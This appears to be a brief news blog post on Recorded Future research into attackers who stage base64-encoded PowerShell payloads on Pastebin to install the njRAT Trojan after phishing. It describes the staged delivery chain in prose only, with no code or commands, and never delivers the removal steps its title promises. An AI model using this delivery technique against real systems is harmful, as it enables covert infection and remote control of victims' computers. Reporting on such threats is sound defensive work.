What are Hackers Encoding Malicious PowerShell Scripts? And, How to Get Rid of them?
These are malicious entities. Their job is to infect Computer with an njRAT remote access Trojan, highly infectious PowerShell scripts in base64 and on plane sites like Pastebin.
A Research and a blog post by Recorded Future revealed these details. Recorded Future is a threat intelligence firm.
Law-enforcement bulletin on Nov 17 prompted researchers to study the subject. In the report, a warning is sent across the USA. The warning states a threat group is emerging. And, it is expert in attacks on private and public entities.
“In this case the attacker works on the reasonable assumption that individuals working closely with technology are not restricted in their access to text-based resources, like paste sites and code repositories,” Chris Pace, wrote in his blog. He is the marketing and content director EMEA region of Recorded Future’s. “They also take advantage of the fact that security at the web layer may not be able to decode and identify that this program is malicious,” writes Pace.
Recorded Future then used its threat intelligence analytical engine to scour online code repositories. In addition to it, Criminal Forums and Paste sites just in reference to infectious PowerShell Scripts.
The researchers were able to find malicious base64-encoded PowerShell scripts sitting on a Pastebin page. These scripts infect computers with remote access Trojan njRAT.
Moreover, Pace writes the attackers are not just restricted to text based resources only. Then they take advantage of the fact web layer is not able to identify program is malicious.
The researchers then said hackers apply specific techniques in wild.
Further, an Individual from Saudi Arabia was trying to hide a malicious PowerShell script on Pastebin page. And, the aim of this individual or the group behind it was to distribute remote access Trojan njRAT.
According to the report, the attacker at first utilized phishing emails and websites to penetrate Downloader-type program into victim computers.
“This “first-stage implant” would then retrieve a base64-encoded portable executable (PE) file from a Pastebin page. The PE file then would call back to Pastebin once more to collect its own payload; namely, njRAT” Pace writes in his blog.
“This is a very clever attack in the way this was all… strung together,” said Levi Gundert, Recorded Future’s VP of intelligence and strategy.
He is the one who authored this report. “The key takeaway for defenders is… what is the next evolution of this going to look like and how are you going to detect it?” he adds.